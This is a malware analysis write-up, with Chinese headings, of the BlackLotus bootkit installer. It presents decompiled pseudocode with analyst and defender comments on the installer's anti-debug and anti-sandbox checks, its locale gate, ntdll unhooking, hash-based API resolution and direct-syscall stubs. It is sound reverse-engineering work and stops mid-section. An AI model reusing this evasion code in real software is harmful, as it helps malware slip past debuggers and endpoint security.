BlackLotus 分析1--安装器阶段
BlackLotus 分析1--安装器阶段
目录
文件信息
BlackLotus installer.
SHA-1: a5a530a91100ed5f07a5d74698b15c646dd44e16
start
__int64 start()
{
// Installer entry point.
//   1. Hide the current thread from debuggers (a direct syscall, issued
//      before any ntdll export has been resolved - see the stub below).
//   2. Run the locale / anti-debug / anti-sandbox gate.
//   3. If clean: resolve the remaining imports, then either install the
//      bootkit (already at high integrity) or go through the UAC bypass.
// Every "detected" branch stores to address 0, so the process dies with an
// access violation instead of exiting; a sandbox report shows a crash, not
// an exit code. Control never returns from here: the function ends in
// NtTerminateProcess with exit code 0x69.
// Defender notes: the checks are short-circuited with ||, so the first
// positive signal decides and an analysis VM that trips any one of them
// never reaches install_bootkit_main / do_uac_bypass. Early observable
// indicators: NtSetInformationThread(ThreadHideFromDebugger) as almost the
// first call, NtQueryInformationProcess with the debug classes,
// NtQuerySystemInformation(0x23), and the SMBIOS/ACPI firmware-table reads.
// Anti-debug: ThreadHideFromDebugger on the current thread ((HANDLE)-2 is the
// current-thread pseudo-handle).
NtSetInformationThread((HANDLE)0xFFFFFFFFFFFFFFFEi64, ThreadHideFromDebugger, 0i64, 0);
if ( isBeingDebugged() )// NtCurrentPeb()->BeingDebugged
MEMORY[0] = 0x4E8C;// deliberate null write -> access violation (crash-out)
init_ntdll();// resolve ntdll exports by hash (also restores ntdll .text from disk)
if ( (unsigned int)is_default_locale_banned()// system default locale is in the exclusion list
|| isBeingDebugged()
|| check_NtGlobalFlag_1400014B0()// (NtCurrentPeb()->NtGlobalFlag & 0x70) != 0;
|| is_being_debugged_ntqueryinformationprocess()// ProcessDebugPort(7) ProcessDebugObjectHandle(0x1e) ProcessDebugFlags(0x1f)
|| (unsigned int)is_kernel_debugger_present()// SystemKernelDebuggerInformation 0x23
|| (unsigned int)is_being_debugged_by_vectored_exception_handler_int3()// int3 swallowed by a debugger instead of reaching the VEH
|| (unsigned int)is_being_debugged_by_vectored_exception_handler_int2d()// int 2Dh variant of the same trick
|| (unsigned int)anti_sandbox_check_loaded_dlls_basename()// sandbox / AV hook DLLs loaded in-process
|| (unsigned int)anti_sandbox_check_loaded_dlls_fullname()// own image name looks like an analysis sample
|| (unsigned int)anti_sandbox_check_processes_running()// hypervisor guest-tool processes
|| (unsigned int)anti_sandbox_check_registry_key_present()// hypervisor guest-tool / ACPI registry keys
|| (unsigned int)anti_sandbox_check_registry_values()// SCSI identifier / manufacturer / BIOS strings
|| (unsigned int)anti_sandbox_check_RSMB()// SMBIOS table contents
|| (unsigned int)anti_sandbox_check_ACPI()// ACPI table contents
|| (unsigned int)anti_sandbox_check_mac_addr()// NIC OUI of a known hypervisor vendor
|| (unsigned int)anti_sandbox_rdtsc() )// CPUID timing
{
MEMORY[0] = 0x4E8C;// deliberate null write -> access violation (crash-out)
}
else
{
init_other_imports();// user32 / advapi32 / rpcrt4 / bcrypt / ole32 / cabinet + kernel32 exports by hash
if ( is_at_least_il_high() ) // SECURITY_MANDATORY_HIGH_RID
install_bootkit_main();// not on this page
else
do_uac_bypass();// not on this page
}
NtTerminateProcess((HANDLE)0xFFFFFFFFFFFFFFFFi64, 0x69);// (HANDLE)-1 = current process
return 0x69i64;// only reached if termination fails
}
init_ntdll
动态加载nt api
void __stdcall init_ntdll()
{
// Resolve the ntdll exports the installer needs into global function
// pointers. Nothing goes through the PE import table: get_ntdll_and_unhook()
// first overwrites ntdll's in-memory .text with a fresh copy mapped from disk
// (removing any user-mode inline hooks), then each export is looked up by
// the 0x1003F string hash (s_hash_0x1003F_1400058B8). 0xD22E2014 is the
// module-name hash used elsewhere on this page for ntdll.
// Defender note: the hash routine is visible on this page, so every constant
// below can be recomputed from the plain export name and used in static
// rules for this sample.
struct _IMAGE_DOS_HEADER *ntdll_and_unhook; // rbx
ntdll_and_unhook = get_ntdll_and_unhook(0xD22E2014);
LdrGetProcedureAddress_14026B020 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD, _QWORD))get_proc_address_by_hash(
ntdll_and_unhook,
0xB08469DD,
0);
RtlInitUnicodeString_14026B000 = (__int64 (__fastcall *)(_QWORD, _QWORD))get_proc_address_by_hash(
ntdll_and_unhook,
0xC8D8F9F4,
0);// <ntdll.RtlInitUnicodeString>
LdrLoadDll_14026B008 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD, _QWORD))get_proc_address_by_hash(// <ntdll.LdrLoadDll>
ntdll_and_unhook,
0xF6CFC604,
0);
RtlAllocateHeap_14026B010 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD))get_proc_address_by_hash(// <ntdll.RtlAllocateHeap>
ntdll_and_unhook,
0x572D53D3u,
0);
RtlFreeHeap_14026B018 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD))get_proc_address_by_hash(// <ntdll.RtlFreeHeap>
ntdll_and_unhook,
0x10DE9522u,
0);
RtlRemoveVectoredExceptionHandler_14026B030 = (__int64 (__fastcall *)(_QWORD))get_proc_address_by_hash(
ntdll_and_unhook,
0xBB26CCEB,
0);// RtlRemoveVectoredExceptionHandler
RtlAddVectoredExceptionHandler_14026B028 = (__int64 (__fastcall *)(_QWORD, _QWORD))get_proc_address_by_hash(
ntdll_and_unhook,
0x89AB8454,
0);// <ntdll.RtlAddVectoredExceptionHandler>
wcsstr_14026B038 = (__int64 (__fastcall *)(_QWORD, _QWORD))get_proc_address_by_hash(ntdll_and_unhook, 0xB2AECB6A, 0);// <ntdll.wcsstr>
EtwEventWriteNoRegistration_14026B0E0 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD))get_proc_address_by_hash(ntdll_and_unhook, 0xF0238EA7, 0);// <ntdll.EtwEventWriteNoRegistration>
itow_14026B160 = (__int64)get_proc_address_by_hash(ntdll_and_unhook, 0x839101F2, 0);// <ntdll._itow>
RtlSubAuthoritySid_14026B170 = (__int64 (__fastcall *)(_QWORD, _QWORD))get_proc_address_by_hash(
ntdll_and_unhook,
0x319CEA81u,
0);// <ntdll.RtlSubAuthoritySid>
RtlSubAuthorityCountSid_14026B178 = (__int64 (__fastcall *)(_QWORD))get_proc_address_by_hash(
ntdll_and_unhook,
0xC96D110C,
0);// <ntdll.RtlSubAuthorityCountSid>
RtlIdentifierAuthoritySid_14026B168 = (__int64 (__fastcall *)(_QWORD))get_proc_address_by_hash(
ntdll_and_unhook,
0xEF508FEu,
0);// <ntdll.RtlIdentifierAuthoritySid>
}
get_ntdll_and_unhook
PIMAGE_DOS_HEADER __fastcall get_ntdll_and_unhook(DWORD a1)
{
// Return the base of the loaded module whose name hashes to a1 (ntdll for
// the only caller on this page), after overwriting that module's in-memory
// .text with the .text of a fresh SEC_IMAGE mapping of the same file from
// disk. Net effect: inline hooks that a user-mode EDR/AV placed in ntdll's
// code are removed before the installer resolves its imports. Kernel-side
// telemetry is not affected by this; only in-process hooks are.
// Detection points visible here: a second image-backed mapping of ntdll in
// the process (NtCreateSection with SEC_IMAGE + NtMapViewOfSection),
// NtProtectVirtualMemory switching ntdll's .text range to 0x40
// (PAGE_EXECUTE_READWRITE) and back, and a .text hash that no longer
// matches the one recorded at load time.
// (local declarations collapsed in the decompiler view)
FileHandle = 0i64;
Handle = 0i64;// section handle
v19 = 0i64;// view size (out)
v16 = 0i64;// base of the fresh mapping (out)
Count = 0i64;// receives the module path from get_dll_base
if ( is_being_debugged_ntqueryinformationprocess() )
MEMORY[0] = 0x4E8C;// deliberate null write -> crash-out
dll_base = get_dll_base(a1, (PCWSTR *)&Count);// live module base + its path
p_e_magic = &dll_base->e_magic;// same address as dll_base
if ( dll_base && Count )
{
v4 = (_IMAGE_NT_HEADERS64 *)((char *)dll_base + dll_base->e_lfanew);// NT headers of the live image
v5 = deobfuscate_wstring(path_prefix_14000AA98, 5u, 1);// rax:L"\\??\\"
// Inlined bounded copy of the L"\??\" prefix into Destination (capacity
// 0x108 wide chars). The compare against 0xFFFFFFFF8000010A looks like a
// decompiler artifact of the loop bound rather than a meaningful check.
v6 = 0x108i64;
v7 = Destination;
v8 = (char *)v5 - (char *)Destination;
do
{
if ( v6 == 0xFFFFFFFF8000010Aui64 )
break;
v9 = *(wchar_t *)((char *)v7 + v8);
if ( !v9 )
break;
*v7++ = v9;
--v6;
}
while ( v6 );
v10 = v7 + 0xFFFFFFFF;// v7 - 1 when the copy stopped because the buffer filled up
if ( v6 )
v10 = v7;
v11 = (const wchar_t *)Count;
*v10 = 0;
wcsncat(Destination, 0x108ui64, v11); // \??\C:\Windows\SYSTEM32\ntdll.dll
v20.Buffer = Destination;// UNICODE_STRING over the NT path
v20.Length = 2 * wcslen_1400058DC(Destination);
ObjectAttributes.Length = 0x30;// sizeof(OBJECT_ATTRIBUTES)
ObjectAttributes.RootDirectory = 0i64;
v20.MaximumLength = 2 * (wcslen_1400058DC(Destination) + 1);
ObjectAttributes.Attributes = 0x40;// OBJ_CASE_INSENSITIVE
ObjectAttributes.ObjectName = &v20;
*(_OWORD *)&ObjectAttributes.SecurityDescriptor = 0i64;
// Open the file (FILE_READ_DATA, FILE_ATTRIBUTE_NORMAL, FILE_SHARE_READ,
// FILE_OPEN, FILE_NON_DIRECTORY_FILE), create a SEC_IMAGE (0x1000000)
// section over it with PAGE_READONLY and map it into this process. An
// image section is laid out like a loaded module, so the section RVAs of
// the live ntdll can be applied directly to v16 below.
if ( NtCreateFile(&FileHandle, 1u, &ObjectAttributes, &IoStatusBlock, 0i64, 0x80u, 1u, 1u, 0x40u, 0i64, 0) >= 0
&& NtCreateSection(&Handle, 0xF001Fu, 0i64, 0i64, 2u, 0x1000000u, FileHandle) >= 0
&& (int)NtMapViewOfSection(Handle, 0xFFFFFFFFFFFFFFFFui64, &v16, 0i64, 0i64, 0i64, &v19, 1, 0, 2) >= 0
&& *p_e_magic == 0x5A4D )// "MZ" on the live image
{
v12 = 0;
if ( v4->FileHeader.NumberOfSections )
{ // copy .text
// 0x28-->sizeof(struct IMAGE_SECTION_HEADER SectionHeaders)
while ( 1 )
{
// v13 + 0x18 is the start of section header v12 (section headers
// follow Signature + FILE_HEADER + OptionalHeader).
v13 = (__int64)v4 + 0x28 * v12 + v4->FileHeader.SizeOfOptionalHeader;
// 0x18-->
// DWORD Signature (0x4)
// struct IMAGE_FILE_HEADER FileHeader (0x14)
if ( (unsigned int)s_hash_0x1003F_1400058B8((_BYTE *)(v13 + 0x18)) == 0x7BC3E49B )// .text
// struct IMAGE_SECTION_HEADER SectionHeaders
// Name[8]
break;
if ( ++v12 >= v4->FileHeader.NumberOfSections )
goto LABEL_20;// no .text section found: live image left untouched
}
// Unhook: make the live .text writable+executable (0x40 =
// PAGE_EXECUTE_READWRITE), copy the clean bytes from the fresh mapping
// over it, then put the original protection back.
OldAccessProtection = 0;
BaseAddress = (char *)p_e_magic + *(unsigned int *)(v13 + 0x24);// +0xc DWORD VirtualAddress
NumberOfBytesToProtect = *(unsigned int *)(v13 + 0x20);// +0x8 DWORD VirtualSize
NtProtectVirtualMemory(
(HANDLE)0xFFFFFFFFFFFFFFFFi64,
&BaseAddress,
&NumberOfBytesToProtect,
0x40u,
&OldAccessProtection);
memcpy_140001024(
(char *)p_e_magic + *(unsigned int *)(v13 + 0x24),// dst: live .text
(char *)v16 + *(unsigned int *)(v13 + 0x24),// src: same RVA in the fresh mapping
*(unsigned int *)(v13 + 0x20));
NtProtectVirtualMemory(
(HANDLE)0xFFFFFFFFFFFFFFFFi64,
&BaseAddress,
&NumberOfBytesToProtect,
OldAccessProtection,
&OldAccessProtection);
}
}
}
LABEL_20:
// Cleanup on every path: the extra mapping is unmapped so only the (now
// rewritten) loaded ntdll remains. Return values of NtClose and
// NtUnmapViewOfSection are ignored.
if ( FileHandle )
NtClose(FileHandle);
if ( Handle )
NtClose(Handle);
if ( v16 )
NtUnmapViewOfSection((HANDLE)0xFFFFFFFFFFFFFFFFi64, v16);
return get_dll_base(a1, 0i64);// re-resolve the base, this time without the path out-param
}
get_proc_address_by_hash
void *__fastcall get_proc_address_by_hash(PIMAGE_DOS_HEADER base, DWORD hash, unsigned __int16 ordinal)
{
// Custom GetProcAddress over the export directory of `base`.
//   hash != 0 : linear scan of AddressOfNames, comparing the 0x1003F hash
//               (s_hash_0x1003F_1400058B8) of each name with `hash`.
//   hash == 0 : lookup by `ordinal`, biased by the export directory Base.
// If the resolved address lies inside the export directory it is a
// forwarder string ("module.function", "module.#ordinal", or an api-/ext-
// API-set contract): the target module is loaded with load_library_w and
// the lookup recurses, or goes through LdrGetProcedureAddress for API sets.
// Returns NULL when the headers do not validate, the export directory is
// empty, the name is not found, or the ordinal is out of range.
// Defender note: on the normal path no loader API is called at all, so
// import-resolution telemetry only ever sees the forwarder / API-set cases.
// (local declarations collapsed in the decompiler view)
hash1 = hash;
v5 = 0;// ordinal handed to the recursive call for "#N" forwarders
func = 0i64;
v32 = 0i64;// out-param for LdrGetProcedureAddress; also the NULL result on a name miss
memset_140001000(v31, 0, 0x208ui64);// forwarder module name (treated as a wide string later)
v7 = 0x104i64;// remaining capacity of v30
memset_140001000(v30, 0, 0x104ui64);// forwarder function name (ANSI)
if ( base )
{
if ( base->e_magic == 0x5A4D )// "MZ"
{
v8 = (_IMAGE_NT_HEADERS64 *)((char *)base + base->e_lfanew);
if ( v8->Signature == 0x4550 )// "PE"
{
if ( v8->OptionalHeader.DataDirectory[0].Size )// DataDirectory[0] = export directory
{
v9 = (_IMAGE_EXPORT_DIRECTORY *)((char *)base + v8->OptionalHeader.DataDirectory[0].VirtualAddress);
NameOrdinals = (WORD *)((char *)&base->e_magic + v9->AddressOfNameOrdinals);// &base->e_magic == base
Names = (char **)((char *)base + v9->AddressOfNames);// array of name RVAs
Names1 = Names;
if ( hash1 )
{
// Lookup by name hash.
v13 = 0;
if ( !v9->NumberOfNames )
return (void *)func;// NULL
while ( 1 )
{
v14 = s_hash_0x1003F_1400058B8((_BYTE *)base + *((unsigned int *)Names + v13));
if ( v14 == hash1 )
break;
Names = Names1;// no-op left by the decompiler
if ( ++v13 >= v9->NumberOfNames )
{
func = v32;// v32 is still 0 here: name not found, falls through to NULL
goto LABEL_15;
}
}
Functions = *(unsigned int *)((char *)&base->e_magic + 4 * NameOrdinals[v13] + v9->AddressOfFunctions);// 4-byte RVA
}
else
{
// Lookup by ordinal.
v11 = v9->Base;
if ( ordinal < v11 || ordinal >= v11 + v9->NumberOfFunctions )
return (void *)func;// NULL: ordinal outside [Base, Base + NumberOfFunctions)
// NOTE(review): this reads 8 bytes with an 8-byte stride, whereas
// AddressOfFunctions holds 4-byte RVAs and the name path above uses a
// 4-byte stride; looks like a bug in the ordinal path - confirm in the
// disassembly.
Functions = *(_QWORD *)((char *)&base->e_magic + 8 * (ordinal - v11) + v9->AddressOfFunctions);
}
func = (unsigned __int64)base + Functions;
v32 = func;
LABEL_15:
// Forwarded export: the "address" points into the export directory and is
// really a NUL-terminated "module.function" string.
if ( func
&& func >= (unsigned __int64)v9
&& func < (unsigned __int64)v9 + v8->OptionalHeader.DataDirectory[0].Size )
{
// Copy the module part (up to the '.') into v31. There is no upper bound
// on this copy; it relies on the forwarder string being well-formed.
v15 = *(_BYTE *)func; // <module>.<functionname>
LODWORD(v16) = 0;
if ( *(_BYTE *)func != 0x2E )// '.'
{
v17 = 0i64;
do
{
v16 = (unsigned int)(v16 + 1);
v31[v17] = v15;
v17 = (unsigned int)v16;
v15 = *(_BYTE *)(v16 + func);
}
while ( v15 != 0x2E );
}
// presumably widens the ANSI module name in place - v31 is handled as a
// wide string (wcslen / load_library_w) from here on; confirm.
ws_tolittle_1400059D8(v31, (__int64)v31);
v18 = wcslen_1400058DC(v31);
// Copy the part after the '.' into v30, bounded by v7 (0x104). Same
// inlined-copy shape as in get_ntdll_and_unhook, artifact compare included.
v19 = v30;
v20 = func + v18 + 1i64 - (_QWORD)v30;
do
{
if ( v7 == 0xFFFFFFFF80000106ui64 )
break;
v21 = v19[v20];
if ( !v21 )
break;
*v19++ = v21;
--v7;
}
while ( v7 );
v22 = v19 + 0xFFFFFFFF;// v19 - 1 when the copy stopped because v30 filled up
if ( v7 )
v22 = v19;
*v22 = 0;
library_w = load_library_w(v31);// load the forwarder target module
v24 = library_w;
// API-set contracts: the forwarder starts with "api-" or "ext-" (the
// multichar constants are the little-endian dword of those four bytes).
// These go through ntdll's LdrGetProcedureAddress instead of the export
// walk; v28/v29 look like an ANSI_STRING {Length, MaximumLength, Buffer}
// built over v30 - confirm.
if ( *(_DWORD *)func == '-ipa' || *(_DWORD *)func == '-txe' )
{
if ( library_w )
{
v29 = v30;
v28[0] = strlen_1400058F4(v30);
v28[1] = v28[0] + 1;
LdrGetProcedureAddress_14026B020(v24, v28, 0i64, &v32);
return (void *)v32;
}
else
{
return 0i64;
}
}
else
{
// "#N" forwards by ordinal, anything else by name hash. Recurse into the
// target module; a NULL v24 is rejected by the base check at the top.
if ( v30[0] == '#' )
{
v25 = 0;
v5 = atoi_140005954(&v30[1]);
}
else
{
v25 = s_hash_0x1003F_1400058B8(v30);
}
return get_proc_address_by_hash(v24, v25, v5);
}
}
}
}
}
}
return (void *)func;
}
s_hash_0x1003F_1400058B8
__int64 __fastcall s_hash_0x1003F_1400058B8(_BYTE *a1)
{
// String hash used by every lookup on this page (module, export, section
// and process names): for each byte c of the NUL-terminated string,
//   result = (uint32)(result * 0x1003F + (signed char)c)
// The (unsigned int) cast truncates to 32 bits on every step; the value is
// returned zero-extended to 64 bits. NULL and "" both hash to 0. The (char)
// cast indicates a sign-extending load, so bytes >= 0x80 contribute a
// negative term.
// Defender note: the routine is small enough to reimplement, which lets the
// hashed constants on this page be checked against plain names and turned
// into static signatures for this sample. anti_sandbox_check_loaded_dlls_
// fullname uses a wide-string sibling (ws_hash_0x1003F_140005894, not shown).
__int64 result; // rax
result = 0i64;
if ( a1 )
{
while ( *a1 )
result = (unsigned int)((char)*a1++ + 0x1003F * result);// one 32-bit modular step per byte
}
return result;
}
is_default_locale_banned
https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-LCID/[MS-LCID].pdf
__int64 is_default_locale_banned()
{
// Region gate. Returns 1 when the system default locale (NtQueryDefaultLocale
// with UserProfile = 0) is one of the excluded LCIDs, 0 otherwise, and 0
// when the query fails. The excluded set, decoded from the bitmask below
// (bit n <=> LCID 0x419 + n) plus the two explicit compares at the end:
//   ru-RU 0x419 (bit 0), uk-UA 0x422 (bit 9), be-BY 0x423 (bit 10),
//   hy-AM 0x42B (bit 18), kk-KZ 0x43F (bit 38), ro-MD 0x818, ru-MD 0x819.
// In start() a positive result leads straight to the crash-out, so a host or
// analysis VM with one of these system locales never reaches the install path.
// (local declarations collapsed in the decompiler view)
v0 = 0;
v4 = 0;// LCID out
if ( NtQueryDefaultLocale(0, &v4) < 0 )
return 0i64;
v1 = v4 - 0x419;// offset into the 0x419..0x43F window covered by the bitmask
if ( (unsigned int)v1 <= 0x26 )
{
// 0x0419 ru-RU
// 0x041A hr-HR
// 0x041B sk-SK
// 0x041C sq-AL
// 0x041D sv-SE
// 0x041E th-TH
// 0x041F tr-TR
// 0x0420 ur-PK
// 0x0421 id-ID
// 0x0422 uk-UA
// 0x0423 be-BY
// 0x0424 sl-SI
// 0x0425 et-EE
// 0x0426 lv-LV
// 0x0427 lt-LT
// 0x0428 tg-Cyrl-TJ
// 0x0429 fa-IR
// 0x042A vi-VN
// 0x042B hy-AM
// 0x042C az-Latn-AZ
// 0x042D eu-ES
// 0x042E hsb-DE
// 0x042F mk-MK
// 0x0430 st-ZA
// 0x0431 ts-ZA
// 0x0432 tn-ZA
// 0x0433 ve-ZA
// 0x0434 xh-ZA
// 0x0435 zu-ZA
// 0x0436 af-ZA
// 0x0437 ka-GE
// 0x0438 fo-FO
// 0x0439 hi-IN
// 0x043A mt-MT
// 0x043B se-NO
// 0x043D yi-001
// 0x043E ms-MY
// 0x043F kk-KZ
v2 = 0x4000040601i64;// bits 0, 9, 10, 18 and 38 set
if ( _bittest64(&v2, v1) ) // 0x4000040601
// 0100000000000000000001000000011000000001
return 1i64; // 1049 ru-RU Russia
// 1058 uk-UA Ukraine
// 1059 be-BY Belarus
// 1067 hy-AM Armenia
// 1087 kk-KZ Kazakhstan (bit 38 of the mask, missing from the list above)
}
if ( v4 == 0x818 ) // 0x0818 ro-MD Moldova
return 1i64;
LOBYTE(v0) = v4 == 0x819; // 0x0819 ru-MD Moldova
return v0;
}
反调试
1、NtSetInformationThread
//ThreadHideFromDebugger
NTSTATUS __stdcall NtSetInformationThread(
HANDLE ThreadHandle,
THREADINFOCLASS ThreadInformationClass,
PVOID ThreadInformation,
ULONG ThreadInformationLength)
{
// Direct-syscall stub (the installer's own NtSetInformationThread, not
// ntdll's). The syscall number comes from get_syscall_numb_140002DCC via a
// 0x1003F name hash (0x2ED76231 - presumably "ZwSetInformationThread", since
// the table only holds Zw* names), and the instruction is issued from this
// module, so user-mode hooks on ntdll never see the call. The decompiler
// shows only the number load and the syscall; the argument register setup is
// not visible here - confirm in the disassembly. The lookup's not-found value
// (0xFFFFFFFF) is used as the syscall number without any check.
// Detection: syscall instructions executing outside ntdll / win32u (return
// address inside the installer image).
NTSTATUS result; // eax
result = get_syscall_numb_140002DCC(0x2ED76231);// syscall number by Zw-name hash
__asm { syscall; Low latency system call }
return result;
}
get_syscall_numb_140002DCC
__int64 __fastcall get_syscall_numb_140002DCC(int a1)
{
// Map a Zw* export-name hash (a1) to its syscall number. The table
// ntfunc_hashs_1402684E0 is built lazily by get_ntfunc_hashs_140002C58:
// [0] holds the entry count, and entry i occupies four dwords with the name
// hash at [4*i + 2] and the export RVA as a qword at [4*i + 4]. Entries are
// sorted by RVA, and the position in that order is returned as the syscall
// number (ntdll's stubs are laid out in ascending syscall-number order, which
// is what this relies on). Returns 0xFFFFFFFF when the hash is not present;
// the syscall stubs on this page do not check for that value.
// Each call also re-runs the NtGlobalFlag debugger check and crashes out on a
// hit, so every direct syscall doubles as an anti-debug probe.
unsigned int v2; // edi
unsigned int v3; // ebx
unsigned int v4; // eax
unsigned int v5; // ecx
v2 = 0xFFFFFFFF;// not-found sentinel
v3 = 0;
if ( check_NtGlobalFlag_1400014B0() )
MEMORY[0] = 0x4E8C;// deliberate null write -> crash-out
v4 = ntfunc_hashs_1402684E0[0];// entry count (0 until the table has been built)
if ( ntfunc_hashs_1402684E0[0]
|| (unsigned int)get_ntfunc_hashs_140002C58((unsigned int *)ntfunc_hashs_1402684E0)
&& (v4 = ntfunc_hashs_1402684E0[0]) != 0 )
{
// Scan every entry; the last matching index wins (no early exit).
do
{
v5 = v3;
if ( a1 != ntfunc_hashs_1402684E0[4 * v3 + 2] )
v5 = v2;
++v3;
v2 = v5;
}
while ( v3 < v4 );
}
return v2;
}
get_ntfunc_hashs_140002C58
__int64 __fastcall get_ntfunc_hashs_140002C58(unsigned int *a1)
{
// Build the syscall-number table consumed by get_syscall_numb_140002DCC.
// Walks ntdll's export name table backwards and keeps every export whose
// name starts with "Zw" ('wZ' is the little-endian word of those two bytes),
// recording per entry: a1[4*i + 2] = 0x1003F hash of the name and
// *(QWORD *)&a1[4*i + 4] = the function's RVA (read through the ordinal
// table; the base is not added). At most 500 entries are kept. a1[0]
// receives the count, then the entries are bubble-sorted by RVA (ascending)
// so that an entry's index equals its syscall number. Returns the entry
// count, or 0 when ntdll is not found or its headers do not validate.
// The export walk is a do/while with a pre-decrement, so it assumes
// NumberOfNames > 0 (true for ntdll).
// (local declarations collapsed in the decompiler view)
v2 = 0;
v3 = 0;// number of Zw* entries collected
dll_base = (__int64)get_dll_base(0xD22E2014, 0i64);// 0xD22E2014-->ntdll
if ( dll_base )
{
if ( *(_WORD *)dll_base == 0x5A4D )// "MZ"
{
v5 = (_IMAGE_NT_HEADERS64 *)*(int *)(dll_base + 0x3C);// e_lfanew, used as an offset from dll_base below
if ( *(DWORD *)((char *)&v5->Signature + dll_base) == 0x4550 )// "PE"
{
if ( *(DWORD *)((char *)&v5->OptionalHeader.DataDirectory[0].Size + dll_base) )// export directory present
{
v6 = (_IMAGE_EXPORT_DIRECTORY *)(dll_base
+ *(unsigned int *)((char *)&v5->OptionalHeader.DataDirectory[0].VirtualAddress
+ dll_base));
v7 = dll_base + v6->AddressOfFunctions;
v8 = dll_base + v6->AddressOfNames;
NumberOfNames = v6->NumberOfNames;
v10 = dll_base + v6->AddressOfNameOrdinals;
do
{
v11 = (_BYTE *)(dll_base + *(unsigned int *)(v8 + 4i64 * --NumberOfNames));// export name string
if ( *(_WORD *)v11 == 'wZ' ) // Zw
{
v12 = 2i64 * v3;
a1[4 * v3++ + 2] = s_hash_0x1003F_1400058B8(v11);// hash of the "Zw..." name
*(_QWORD *)&a1[2 * v12 + 4] = *(unsigned int *)(v7
+ 4i64 * *(unsigned __int16 *)(v10 + 2i64 * NumberOfNames));// RVA of the stub
if ( v3 == 500 )
break;
}
}
while ( NumberOfNames );
v13 = 0;
*a1 = v3;
v2 = v3;
// Bubble sort of the v3 entries by RVA, swapping hash and RVA together.
// v3 / v15 are reloaded from *a1 each pass; *a1 itself never changes.
if ( v3 != 1 )
{
do
{
v14 = 0;
v15 = v3;
if ( v3 - v13 != 1 )
{
do
{
v16 = v14 + 1;
v17 = 2i64 * v14;
v18 = 2i64 * (v14 + 1);
v19 = *(_QWORD *)&a1[4 * v14 + 4];// RVA of entry v14
v20 = *(_QWORD *)&a1[4 * v14 + 8];// RVA of entry v14 + 1
if ( v19 > v20 )
{
v21 = a1[4 * v14 + 2];
a1[2 * v17 + 2] = a1[2 * v18 + 2];
a1[2 * v18 + 2] = v21;
*(_QWORD *)&a1[2 * v17 + 4] = v20;
*(_QWORD *)&a1[2 * v18 + 4] = v19;
}
v3 = *a1;
v14 = v16;
}
while ( v16 < *a1 - v13 - 1 );
v15 = *a1;
}
++v13;
}
while ( v13 < v15 - 1 );
}
}
}
}
}
return v2;
}
2、isBeingDebugged
int isBeingDebugged(void)
{
// PEB->BeingDebugged, the same byte IsDebuggerPresent() reads. Returns 1
// when a user-mode debugger is attached to this process, else 0.
return NtCurrentPeb()->BeingDebugged != 0;
}
3、check_NtGlobalFlag
_BOOL8 check_NtGlobalFlag_1400014B0()
{
// PEB->NtGlobalFlag & 0x70: the three heap-debug flags (tail check, free
// check, validate parameters) that the loader sets when a process is created
// under a debugger. Returns 1 when any of them is set.
return (NtCurrentPeb()->NtGlobalFlag & 0x70) != 0;
}
4、is_being_debugged_ntqueryinformationprocess
DWORD __stdcall is_being_debugged_ntqueryinformationprocess()
{
// Three NtQueryInformationProcess probes on the current process
// ((HANDLE)-1); returns 1 if any indicates a debugger, else 0:
//   ProcessDebugPort (7)            -> nonzero port
//   ProcessDebugObjectHandle (0x1e) -> nonzero handle (the decompiler
//                                      renders the class as ProcessWow64Information|4)
//   ProcessDebugFlags (0x1f)        -> value 0, i.e. the NoDebugInherit flag
//                                      is cleared (rendered as ProcessBreakOnTermination|2)
// A failed query never counts as a detection; the third probe only fires
// when the call succeeds AND the returned flag is 0.
DWORD v0; // ebx
int v2; // [rsp+40h] [rbp+8h] BYREF
__int64 ProcessInformation; // [rsp+48h] [rbp+10h] BYREF
v0 = 0;
v2 = 0;
ProcessInformation = 0i64;
if ( NtQueryInformationProcess((HANDLE)0xFFFFFFFFFFFFFFFFi64, ProcessDebugPort, &v2, 4u, 0i64) >= 0 && v2 )
v0 = 1;
if ( NtQueryInformationProcess(
(HANDLE)0xFFFFFFFFFFFFFFFFi64,
ProcessWow64Information|0x4, // 0x1e-->ProcessDebugObjectHandle
&ProcessInformation,
8u,
0i64) >= 0
&& ProcessInformation )
{
v0 = 1;
}
if ( NtQueryInformationProcess((HANDLE)0xFFFFFFFFFFFFFFFFi64, ProcessBreakOnTermination|0x2, &v2, 4u, 0i64) >= 0// 0x1f-->ProcessDebugFlags
&& !v2 )// 0 == being debugged
{
return 1;
}
return v0;
}
5、is_kernel_debugger_present
__int64 is_kernel_debugger_present()
{
// NtQuerySystemInformation class 0x23 (SystemKernelDebuggerInformation; the
// decompiler renders it as SystemExceptionInformation|SystemPerformanceInformation)
// fills two adjacent BOOLEANs: KernelDebuggerEnabled (SystemInformation) and
// KernelDebuggerNotPresent (v3, the next byte on the stack). Returns 1 when a
// kernel debugger is enabled or present, 0 otherwise or when the query fails.
unsigned int v0; // ebx
char SystemInformation; // [rsp+30h] [rbp+8h] BYREF
char v3; // [rsp+31h] [rbp+9h]
v0 = 0;
if ( NtQuerySystemInformation(SystemExceptionInformation|SystemPerformanceInformation, &SystemInformation, 2u, 0i64) >= 0// SystemKernelDebuggerInformation 0x23
&& (SystemInformation || !v3) )// KernelDebuggerEnabled || !KernelDebuggerNotPresent
{
return 1;
}
return v0;
}
6、is_being_debugged_by_vectored_exception_handler_int3
__int64 is_being_debugged_by_vectored_exception_handler_int3()
{
// Registers a first-call vectored exception handler (first argument 1), sets
// gisDebugger_14000C000 = 1 and executes int3 (__debugbreak). Without a
// debugger the breakpoint exception reaches VectoredHandler_1400020D0, which
// is expected to clear the flag (the handler is not on this page - confirm);
// with a debugger attached the breakpoint is swallowed by it and the flag
// stays 1. Returns the flag, or 1 when the handler could not be registered
// (registration failure is treated as "debugged").
unsigned int v0; // ebx
__int64 v1; // rax
v0 = 1;
v1 = RtlAddVectoredExceptionHandler_14026B028(1i64, VectoredHandler_1400020D0);
gisDebugger_14000C000 = 1;
if ( v1 )
{
__debugbreak();// int3
RtlRemoveVectoredExceptionHandler_14026B030(v1);
return (unsigned int)gisDebugger_14000C000;
}
return v0;
}
7、is_being_debugged_by_vectored_exception_handler_int2d
